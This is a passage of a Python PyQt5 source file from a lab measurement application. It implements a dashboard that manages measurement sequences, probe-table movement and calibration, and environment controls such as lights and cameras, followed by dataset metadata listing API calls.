settings.settings.get(\"use_environ\", False)\n self.environmentControlWidget.setChecked(use_environ)\n self.tableControlWidget.readSettings()\n self.operatorWidget.readSettings()\n self.outputWidget.readSettings()\n\n def writeSettings(self):\n settings_ = QtCore.QSettings()\n settings_.beginGroup(\"dashboard\")\n settings_.setValue(\"splitterState\", self.splitter.saveState())\n settings_.endGroup()\n\n self.sequenceControlWidget.writeSettings()\n settings.settings[\"use_environ\"] = self.isEnvironmentEnabled()\n settings.settings[\"use_table\"] = self.isTableEnabled()\n self.operatorWidget.writeSettings()\n self.outputWidget.writeSettings()\n\n def sequenceItems(self) -> list:\n items = []\n for index in range(self.sequenceTreeWidget.topLevelItemCount()):\n item = self.sequenceTreeWidget.topLevelItem(index)\n items.append(item)\n return items\n\n def clearSequence(self) -> None:\n self.sequenceTreeWidget.clear()\n\n def addSequenceItem(self, item: SampleTreeItem) -> None:\n self.sequenceTreeWidget.addTopLevelItem(item)\n\n def sample_name(self):\n \"\"\"Return sample name.\"\"\"\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, MeasurementTreeItem):\n return item.contact.sample.name()\n if isinstance(item, ContactTreeItem):\n return item.sample.name()\n if isinstance(item, SampleTreeItem):\n return item.name()\n return \"\"\n\n def sampleType(self) -> str:\n \"\"\"Return current sample type.\"\"\"\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, MeasurementTreeItem):\n return item.contact.sample.sampleType()\n if isinstance(item, ContactTreeItem):\n return item.sample.sampleType()\n if isinstance(item, SampleTreeItem):\n return item.sampleType()\n return \"\"\n\n def table_position(self):\n \"\"\"Return table position in millimeters as tuple. If table not available\n return (0., 0., 0.).\n \"\"\"\n if self.isTableEnabled():\n return self.table_worker.get_cached_position()\n return Position()\n\n def isEnvironmentEnabled(self) -> bool:\n \"\"\"Return True if environment box enabled.\"\"\"\n return self.environmentControlWidget.isChecked()\n\n def isTableEnabled(self) -> bool:\n \"\"\"Return True if table control enabled.\"\"\"\n return self.tableControlWidget.isChecked()\n\n def currentOperator(self) -> str:\n \"\"\"Return current operator.\"\"\"\n return self.operatorWidget.currentOperator()\n\n def outputDir(self) -> str:\n \"\"\"Return output base path.\"\"\"\n return os.path.realpath(self.outputWidget.currentLocation())\n\n def create_output_dir(self):\n \"\"\"Create output directory for sample if not exists, return directory\n path.\n \"\"\"\n output_dir = self.outputDir()\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n return output_dir\n\n def write_logfiles(self):\n return bool(settings.settings.get(\"write_logfiles\", True))\n\n # Callbacks\n\n def setControlsLocked(self, locked: bool) -> None:\n \"\"\"Lock or unlock dashboard controls.\"\"\"\n self.environmentControlWidget.setEnabled(not locked)\n self.tableControlWidget.setEnabled(not locked)\n self.sequenceControlWidget.setLocked(locked)\n self.outputWidget.setEnabled(not locked)\n self.operatorWidget.setEnabled(not locked)\n self.measurementWidget.setLocked(locked)\n self.plugins.handle(\"lock_controls\", locked)\n\n def setNoticeVisible(self, visible: bool) -> None:\n self.noticeLabel.setVisible(visible)\n if visible:\n self.noticeLabel.animation.start()\n else:\n self.noticeLabel.animation.stop()\n\n # Sequence control\n\n def on_tree_selected(self, item, previous) -> None:\n if not self.operatorWidget.isEnabled():\n return # TODO\n self.panels.store()\n self.panels.unmount()\n self.panels.clear()\n self.panels.hide()\n self.measurementWidget.setControlsVisible(False)\n if isinstance(item, GroupTreeItem):\n panel = self.panels.get(\"group\")\n panel.setVisible(True)\n panel.mount(item)\n if isinstance(item, SampleTreeItem):\n panel = self.panels.get(\"sample\")\n panel.setVisible(True)\n panel.mount(item)\n if isinstance(item, ContactTreeItem):\n panel = self.panels.get(\"contact\")\n panel.setVisible(True)\n panel.mount(item)\n if isinstance(item, MeasurementTreeItem):\n panel = self.panels.get(item.item_type)\n if panel:\n panel.setVisible(True)\n panel.mount(item)\n self.measurementWidget.setControlsVisible(True)\n # Show measurement tab\n self.tabWidget.setCurrentWidget(self.measurementWidget)\n\n def on_tree_double_clicked(self, item, index):\n if self.operatorWidget.isEnabled(): # TODO\n self.on_start()\n\n # Contcat table controls\n\n def moveTable(self, contact) -> None:\n if self.isTableEnabled():\n self.setControlsLocked(True)\n x, y, z = contact.position\n self.table_worker.message_changed = lambda message: self.messageChanged.emit(message)\n self.table_worker.progress_changed = lambda a, b: self.progressChanged.emit(a, b)\n self.table_worker.absolute_move_finished = self.on_table_finished\n self.table_worker.safe_absolute_move(x, y, z)\n\n def contactTable(self, contact) -> None:\n if self.isTableEnabled():\n self.setControlsLocked(True)\n x, y, z = contact.position\n z = safe_z_position(z)\n self.table_worker.message_changed = lambda message: self.messageChanged.emit(message)\n self.table_worker.progress_changed = lambda a, b: self.progressChanged.emit(a, b)\n self.table_worker.absolute_move_finished = self.on_table_finished\n self.table_worker.safe_absolute_move(x, y, z)\n\n def on_table_finished(self):\n self.table_worker.absolute_move_finished = None\n current_item = self.sequenceTreeWidget.currentItem()\n if isinstance(current_item, GroupTreeItem):\n panel = self.panels.get(\"group\")\n panel.setVisible(True)\n panel.mount(current_item)\n if isinstance(current_item, SampleTreeItem):\n panel = self.panels.get(\"sample\")\n panel.setVisible(True)\n panel.mount(current_item)\n if isinstance(current_item, ContactTreeItem):\n panel = self.panels.get(\"contact\")\n panel.setVisible(True)\n panel.mount(current_item)\n self.setControlsLocked(False)\n\n def on_start_all(self):\n sample_items = SequenceRootTreeItem(self.sequenceTreeWidget.sequenceItems())\n dialog = StartSequenceDialog(self)\n dialog.setMessage(\"Are you sure to start all enabled sequences for all enabled samples/groups? \")\n dialog.setTableEnabled(self.isTableEnabled())\n self.operatorWidget.writeSettings()\n self.outputWidget.writeSettings()\n dialog.readSettings()\n if dialog.exec() == dialog.Accepted:\n dialog.writeSettings()\n self.operatorWidget.readSettings()\n self.outputWidget.readSettings()\n self._on_start(\n sample_items,\n move_to_contact=dialog.isMoveToContact(),\n move_to_after_position=dialog.isMoveToPosition()\n )\n\n def startMeasurement(self, item: MeasurementTreeItem) -> None:\n contact_item = item.contact\n message = f\"Are you sure to run measurement {item.name()!r} for {contact_item.name()!r}?\"\n result = QtWidgets.QMessageBox.question(self, \"Run Measurement\", message)\n if result == QtWidgets.QMessageBox.Yes:\n self._on_start(item)\n\n def startContact(self, item: ContactTreeItem) -> None:\n dialog = StartSequenceDialog(self)\n dialog.setMessage(f\"Are you sure to start sequence {item.name()!r}? \")\n dialog.setTableEnabled(self.isTableEnabled())\n # TODO\n self.operatorWidget.writeSettings()\n self.outputWidget.writeSettings()\n dialog.readSettings()\n if dialog.exec() == dialog.Accepted:\n dialog.writeSettings()\n self.operatorWidget.readSettings()\n self.outputWidget.readSettings()\n self._on_start(\n item,\n move_to_contact=dialog.isMoveToContact(),\n move_to_after_position=dialog.isMoveToPosition()\n )\n\n def startSample(self, item: SampleTreeItem) -> None:\n dialog = StartSequenceDialog(self)\n dialog.setMessage(f\"Are you sure to start all enabled sequences for {item.name()!r}? \")\n dialog.setTableEnabled(self.isTableEnabled())\n # TODO\n self.operatorWidget.writeSettings()\n self.outputWidget.writeSettings()\n dialog.readSettings()\n if dialog.exec() == dialog.Accepted:\n dialog.writeSettings()\n self.operatorWidget.readSettings()\n self.outputWidget.readSettings()\n self._on_start(\n item,\n move_to_contact=dialog.isMoveToContact(),\n move_to_after_position=dialog.isMoveToPosition()\n )\n\n def on_start(self) -> None:\n # Store settings\n self.writeSettings()\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, MeasurementTreeItem):\n self.startMeasurement(item)\n elif isinstance(item, ContactTreeItem):\n self.startContact(item)\n elif isinstance(item, SampleTreeItem):\n self.startSample(item)\n elif isinstance(item, GroupTreeItem):\n self.startSample(item)\n\n def _on_start(self, item, move_to_contact=False, move_to_after_position=None):\n self.started.emit()\n # Create output directory\n self.panels.store()\n self.panels.unmount()\n self.panels.clear()\n self.create_output_dir()\n self.switch_off_lights()\n self.sync_environment_controls()\n\n config = {\n \"table_position\": self.table_position(), # TODO state\n \"table_contact_delay\": settings.table_contact_delay,\n \"retry_contact_radius\": settings.retry_contact_radius,\n \"retry_contact_distance\": settings.retry_contact_distance,\n \"retry_contact_overdrive\": settings.retry_contact_overdrive,\n \"retry_contact_count\": settings.retry_contact_count,\n \"retry_measurement_count\": settings.retry_measurement_count,\n \"write_logfiles\": self.write_logfiles(),\n \"serialize_json\": settings.export_json,\n \"serialize_txt\": settings.export_txt,\n \"use_environ\": self.isEnvironmentEnabled(),\n \"use_table\": self.isTableEnabled(),\n \"move_to_contact\": move_to_contact,\n \"move_to_after_position\": move_to_after_position,\n \"operator\": self.currentOperator(),\n \"output_dir\": self.outputDir(),\n }\n\n worker = MeasureWorker(self.station, config, item)\n worker.failed.connect(lambda exc: self.failed.emit(exc, None))\n worker.finished.connect(self.on_finished)\n worker.finished.connect(self.sequenceFinished)\n worker.message_changed.connect(self.messageChanged.emit)\n worker.progress_changed.connect(self.progressChanged.emit)\n worker.item_state_changed.connect(self.setItemState)\n worker.item_reset.connect(self.resetItem)\n worker.item_visible.connect(self.showItem)\n worker.item_hidden.connect(self.hideItem)\n worker.save_to_image.connect(self.safeToImage)\n worker.measurement_finished.connect(self.measurementFinished)\n worker.reading_appended.connect(self.appendReading)\n worker.readings_updated.connect(self.updateReadings)\n worker.analysis_appended.connect(self.appendAnalysis)\n worker.state_changed.connect(self.updateState)\n self.aborting.connect(worker.abort)\n\n self.measure_thread = threading.Thread(target=worker)\n self.measure_thread.start()\n\n def appendReading(self, name, x, y):\n if self._panel:\n self._panel.appendReading(name, x, y)\n\n def updateReadings(self):\n if self._panel:\n self._panel.updateReadings()\n\n def appendAnalysis(self, key, value):\n if self._panel:\n self._panel.appendAnalysis(key, value)\n\n def updateState(self, *args):\n if self._panel:\n self._panel.updateState(*args)\n\n def setItemState(self, item, state) -> None:\n item.setState(state)\n item.setExpanded(True)\n self.sequenceTreeWidget.resizeColumns()\n\n def resetItem(self, item) -> None:\n item.reset()\n self.sequenceTreeWidget.resizeColumns()\n\n def showItem(self, item) -> None:\n item.setSelectable(True)\n item.series.clear()\n item.setForeground(0, QtGui.QBrush(QtGui.QColor(\"blue\")))\n self.sequenceTreeWidget.scrollToItem(item)\n self.panels.unmount()\n self.panels.hide()\n self.panels.clear()\n panel = self.panels.get(item.item_type)\n panel.setVisible(True)\n panel.mount(item)\n self._panel = panel\n\n def hideItem(self, item) -> None:\n item.setSelectable(False)\n item.setForeground(0, QtGui.QBrush())\n\n def safeToImage(self, item, filename) -> None:\n plot_png = settings.settings.get(\"png_plots\") or False\n panel = self.panels.get(item.item_type)\n if panel and plot_png:\n panel.saveToImage(filename)\n\n def on_stop(self):\n self.sequenceControlWidget.stop()\n self.aborting.emit()\n\n def on_finished(self):\n self.sync_environment_controls()\n self.finished.emit()\n self.measure_thread = None\n\n def on_reset_sequence_state(self):\n result = QtWidgets.QMessageBox.question(self, \"Reset State\", \"Do you want to reset all sequence states?\")\n if result == QtWidgets.QMessageBox.Yes:\n current_item = self.sequenceTreeWidget.currentItem()\n self._panel = None\n self.panels.unmount()\n self.panels.clear()\n self.panels.hide()\n for sample_item in self.sequenceTreeWidget.sampleItemsOnly():\n sample_item.reset()\n if current_item is not None:\n panel = self.panels.get(current_item.item_type)\n panel.setVisible(True)\n panel.mount(current_item)\n\n def on_edit_sequence(self):\n sequences = load_all_sequences(settings)\n dialog = EditSamplesDialog(self.sequenceTreeWidget.sampleItemsOnly(), sequences)\n dialog.run()\n self.on_tree_selected(self.sequenceTreeWidget.currentItem(), None)\n\n # Measurement control\n\n def restoreDefaults(self) -> None:\n result = QtWidgets.QMessageBox.question(self, \"Restore Defaults\", \"Do you want to restore to default parameters?\")\n if result == QtWidgets.QMessageBox.Yes:\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, MeasurementTreeItem):\n panel = self.panels.get(item.item_type)\n panel.restore()\n\n # Table calibration\n\n def on_table_joystick_toggled(self, state: bool) -> None:\n self.table_worker.enable_joystick(state)\n\n def on_table_joystick_changed(self, state):\n self.tableControlWidget.setJoystickEnabled(state)\n\n def on_table_position_changed(self, position):\n self.tableControlWidget.setPosition(position)\n\n def on_table_calibration_changed(self, position):\n self.tableControlWidget.setCalibration(position)\n panel = self.panels.get(\"contact\")\n if panel:\n enabled = self.isTableEnabled() and self.tableControlWidget.isCalibrationValid()\n panel.setTableEnabled(enabled)\n\n def on_table_control_clicked(self) -> None:\n self.table_worker.enable_joystick(False)\n dialog = AlignmentDialog(self.table_worker, self.contact_quality_process)\n dialog.readSettings()\n dialog.loadSequence(self.sequenceTreeWidget.sequenceItems())\n if self.isEnvironmentEnabled():\n # TODO !!!\n with self.environ_worker as environ_worker:\n pc_data = environ_worker.pc_data()\n dialog.updateSafety(pc_data.relay_states.laser_sensor)\n dialog.update_probecard_light(pc_data.relay_states.probecard_light)\n dialog.update_microscope_light(pc_data.relay_states.microscope_light)\n dialog.update_box_light(pc_data.relay_states.box_light)\n dialog.update_lights_enabled(True)\n dialog.probecardLightToggled.connect(self.on_probecard_light_toggled)\n dialog.microscopeLightToggled.connect(self.on_microscope_light_toggled)\n dialog.boxLightToggled.connect(self.on_box_light_toggled)\n dialog.exec()\n self.contact_quality_process.stop()\n self.contact_quality_process.join()\n dialog.writeSettings()\n dialog.updateSamples()\n # Prevent glitch\n current_item = self.sequenceTreeWidget.currentItem()\n if isinstance(current_item, ContactTreeItem):\n panel = self.panels.get(\"contact\")\n panel.mount(current_item)\n # Restore events...\n self.table_worker.joystick_changed = self.on_table_joystick_changed\n self.table_worker.position_changed = self.on_table_position_changed\n self.table_worker.caldone_changed = self.on_table_calibration_changed\n self.syncTableControls()\n # Store settings\n self.writeSettings()\n\n def on_laser_sensor_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_laser_sensor(state)\n\n def on_box_light_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_box_light(state)\n\n def on_microscope_light_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_microscope_light(state)\n\n def on_microscope_camera_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_microscope_camera(state)\n\n def on_microscope_control_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_microscope_control(state)\n\n def on_probecard_light_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_probecard_light(state)\n\n def on_probecard_camera_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_probecard_camera(state)\n\n def on_pid_control_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_pid_control(state)\n\n def switch_off_lights(self):\n if self.isEnvironmentEnabled():\n with self.environ_worker as environ_worker:\n if environ_worker.has_lights():\n environ_worker.dim_lights()\n\n def sync_environment_controls(self):\n \"\"\"Syncronize environment controls.\"\"\"\n if self.isEnvironmentEnabled():\n with self.environ_worker as environ_worker:\n environ_worker.request_pc_data()\n\n else:\n self.environmentWidget.setEnabled(False)\n\n def setPCData(self, pc_data):\n self.environmentControlWidget.updateLaserSensorState(pc_data.relay_states.laser_sensor)\n self.environmentControlWidget.updateBoxLightState(pc_data.relay_states.box_light)\n self.environmentControlWidget.updateMicroscopeLightState(pc_data.relay_states.microscope_light)\n self.environmentControlWidget.updateMicroscopeCameraState(pc_data.relay_states.microscope_camera)\n self.environmentControlWidget.updateMicroscopeControlState(pc_data.relay_states.microscope_control)\n self.environmentControlWidget.updateProbecardLightState(pc_data.relay_states.probecard_light)\n self.environmentControlWidget.updateProbecardCameraState(pc_data.relay_states.probecard_camera)\n self.environmentControlWidget.updatePidControlState(pc_data.pid_status)\n self.environmentWidget.setEnabled(True)\n t = time.time()\n # Note: occasional crashes due to `NaN` timestamp.\n if not math.isfinite(t):\n logger.error(\"invalid timestamp: %s\", t)\n t = 0\n self.environmentWidget.appendData(t, pc_data)\n\n def syncTableControls(self):\n \"\"\"Syncronize table controls.\"\"\"\n enabled = self.isTableEnabled()\n self.table_worker.enabled = enabled\n self.on_table_position_changed(Position())\n self.on_table_calibration_changed(Position())\n if enabled:\n self.table_worker.status()\n\n def on_environment_groupbox_toggled(self, state):\n if state:\n self.environ_worker.start()\n self.sync_environment_controls()\n else:\n self.environ_worker.stop()\n\n def on_table_groupbox_toggled(self, state: bool) -> None:\n if state:\n self.table_worker.start()\n self.table_worker.enable_joystick(False)\n else:\n self.table_worker.stop()\n self.syncTableControls()\n\n def measurementFinished(self, data: dict) -> None:\n self.plugins.handle(\"measurement_finished\", data=data)\n\n def sequenceFinished(self) -> None:\n data = {} # TODO\n self.plugins.handle(\"sequence_finished\", data=data)\n\n def shutdown(self):\n if self.measure_thread:\n self.on_stop()\n self.measure_thread.join()\n", "repo_name": "hephy-dd/comet-pqc", "sub_path": "pqc/view/dashboard.py", "file_name": "dashboard.py", "file_ext": "py", "file_size_in_byte": 42092, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 45, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 47, "usage_type": "name"}, {"api_name": "sequence.SequenceTreeWidget", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 59, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 59, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 69, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 69, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 73, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 75, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 79, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 81, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 84, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 95, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 95, "usage_type": "name"}, {"api_name": "settings.settings.settings.get", "line_number": 100, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 100, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 100, "usage_type": "name"}, {"api_name": "sequence.GroupTreeItem", "line_number": 104, "usage_type": "call"}, {"api_name": "sequence.SampleTreeItem", "line_number": 106, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 119, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 119, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 136, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 136, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 136, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 137, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 137, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QProgressDialog", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 138, "usage_type": "name"}, {"api_name": "core.config.load_sequence", "line_number": 149, "usage_type": "call"}, {"api_name": "core.config", "line_number": 149, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 154, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 154, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 154, "usage_type": "name"}, {"api_name": "sequence.SampleTreeItem", "line_number": 160, "usage_type": "name"}, {"api_name": "sequence.ContactTreeItem", "line_number": 160, "usage_type": "name"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 160, "usage_type": "name"}, {"api_name": "sequence.SampleTreeItem", "line_number": 168, "usage_type": "call"}, {"api_name": "sequence.GroupTreeItem", "line_number": 176, "usage_type": "call"}, {"api_name": "sequence.SampleTreeItem", "line_number": 185, "usage_type": "argument"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 186, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 186, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 186, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 187, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 187, "usage_type": "name"}, {"api_name": "sequence.GroupTreeItem", "line_number": 189, "usage_type": "argument"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 190, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 190, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 190, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 191, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 191, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 204, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 204, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 206, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 206, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 207, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 207, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 209, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 209, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 209, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 214, "usage_type": "name"}, {"api_name": "components.PositionWidget", "line_number": 219, "usage_type": "call"}, {"api_name": "components.CalibrationWidget", "line_number": 221, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 223, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 223, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 224, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 224, "usage_type": "name"}, {"api_name": "core.utils.make_path", "line_number": 224, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 231, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 231, "usage_type": "name"}, {"api_name": "core.position.Position", "line_number": 248, "usage_type": "name"}, {"api_name": "core.position.Position", "line_number": 254, "usage_type": "name"}, {"api_name": "utils.caldone_valid", "line_number": 256, "usage_type": "call"}, {"api_name": "settings.settings.settings.get", "line_number": 259, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 259, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 259, "usage_type": "name"}, {"api_name": "settings.settings.table_joystick_maximum_limits", "line_number": 261, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 261, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 264, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 264, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 266, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 266, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 266, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 271, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 275, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 279, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 283, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 287, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 291, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 295, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 299, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 303, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 303, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 338, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 338, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QVariantAnimation", "line_number": 342, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 342, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 343, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 343, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 344, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 344, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 345, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 345, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 353, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 353, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 358, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 358, "usage_type": "name"}, {"api_name": "comet.process.ProcessMixin", "line_number": 358, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 362, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 362, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 363, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 363, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 364, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 364, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 365, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 365, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 366, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 366, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 367, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 367, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 369, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 369, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 369, "usage_type": "name"}, {"api_name": "components.OperatorWidget", "line_number": 411, "usage_type": "call"}, {"api_name": "components.WorkingDirectoryWidget", "line_number": 415, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 420, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 420, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 422, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 422, "usage_type": "name"}, {"api_name": "measurementwidget.MeasurementWidget", "line_number": 435, "usage_type": "call"}, {"api_name": "environmentwidget.EnvironmentWidget", "line_number": 438, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTabWidget", "line_number": 446, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 446, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QSplitter", "line_number": 452, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 452, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 459, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 459, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 463, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 463, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 465, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 465, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QSettings", "line_number": 484, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 484, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QByteArray", "line_number": 486, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 486, "usage_type": "name"}, {"api_name": "settings.settings.settings.get", "line_number": 490, "usage_type": 